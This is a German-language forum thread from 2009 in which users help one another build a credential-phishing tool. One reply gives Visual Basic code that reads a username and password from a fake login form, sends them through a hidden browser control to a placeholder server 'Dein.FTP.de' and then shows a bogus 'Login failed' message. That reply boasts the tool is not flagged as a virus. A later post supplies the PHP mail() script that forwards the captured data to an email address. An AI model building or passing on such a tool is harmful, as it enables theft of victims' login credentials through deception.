PHP Forum - Coding Board
Juli 19, 2018, 10:24:54 *
Willkommen Gast. Bitte einloggen oder registrieren.

Einloggen mit Benutzername, Passwort und Sitzungslänge
News:
 
   Übersicht   Hilfe Suche Einloggen Registrieren  
Seiten: [1]
  Drucken  
Autor Thema: Phishing Tool Source  (Gelesen 169 mal)
0 Mitglieder und 1 Gast betrachten dieses Thema.
Viper
Newbie
*
Beiträge: 3


Profil anzeigen E-Mail
« am: März 17, 2009, 06:56:28 »

Hallo Leute habe Probleme mit einem Source...
eigtl will ich nur ein tool welches 2 textboxen hat und einen button das was man eingibt wird per mail an jemanden gesendet oder auf einen FTP als .txt geladen.

Download des sources: http://rapidshare.com/files/210375353/source.rar

Bitte um Hilfe, bei mir hängt sich das Tool immer auf.
Gespeichert
scharkmann
Jr. Member
**
Beiträge: 51


kamelo@live.de
Profil anzeigen E-Mail
« Antworten #1 am: Juni 27, 2009, 01:43:42 »

So hab mal was für dich: erstelle 2 Textboxen Text1 für Username Text2 für passwort.nachdem du dies gemacht hast erstellst du dir ein WebBrowser1 Fenster also rauf damit auf die form mach sie so klein wie möglich.Gehe auf dein FTP server und erstelle eine .php datei namen's: email.php
nun erstellst du auf der form noch ein button in den button fügst du ein:

WebBrowser1.Navigate "http://Dein.FTP.de/email.php?daten=" & Text1.Text & "****" & Text2.Text & "****"
MsgBox "Login failed. Please check your login details"

ändere nur http://Dein.FTP.de  mehr nicht und schon hast du ein phishing tool was nicht als virus angezeigt wird.
Gespeichert

Runaway
Jr. Member
**
Beiträge: 69


Profil anzeigen E-Mail
« Antworten #2 am: Juni 27, 2009, 02:29:04 »

Zitat von: scharkmann;20258
So hab mal was für dich: erstelle 2 Textboxen Text1 für Username Text2 für passwort.nachdem du dies gemacht hast erstellst du dir ein WebBrowser1 Fenster also rauf damit auf die form mach sie so klein wie möglich.Gehe auf dein FTP server und erstelle eine .php datei namen's: email.php
nun erstellst du auf der form noch ein button in den button fügst du ein:

WebBrowser1.Navigate "http://Dein.FTP.de/email.php?daten=" & Text1.Text & "****" & Text2.Text & "****"
MsgBox "Login failed. Please check your login details"

ändere nur http://Dein.FTP.de  mehr nicht und schon hast du ein phishing tool was nicht als virus angezeigt wird.
Wie wäre es wenn du uns den Inhalt der email.php sagst? :p
Wobei es logisch ist das auf die PHP MAIL(); funktion zurückgegriffen wird^^
Gespeichert
Julieh
Newbie
*
Beiträge: 7


Profil anzeigen E-Mail
« Antworten #3 am: Juni 29, 2009, 08:11:52 »

Zitat
$daten = $_GET['daten'];
mail ( 'email@provider.com' , 'Subjekt' , $daten

Ist der Inhalt der email.php
Gespeichert
Serverspy
Full Member
***
Beiträge: 115

435267721
Profil anzeigen E-Mail
« Antworten #4 am: Juni 30, 2009, 12:04:42 »

Also ich an deiner Stelle würde da noch bisschen mehr Sicherheit in die Datei reinbringen.... keine Ahnung welche Variablen du da wie überprüfst, aber ohne die Daten zu filtern, sie einfach direkt zu übernehmen würde ich persönlich nicht wirklich professionell finden.....
Gespeichert

Seiten: [1]
  Drucken  
 
Gehe zu:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.21 | SMF © 2006-2009, Simple Machines | New Look by Nolt Prüfe XHTML 1.0 Prüfe CSS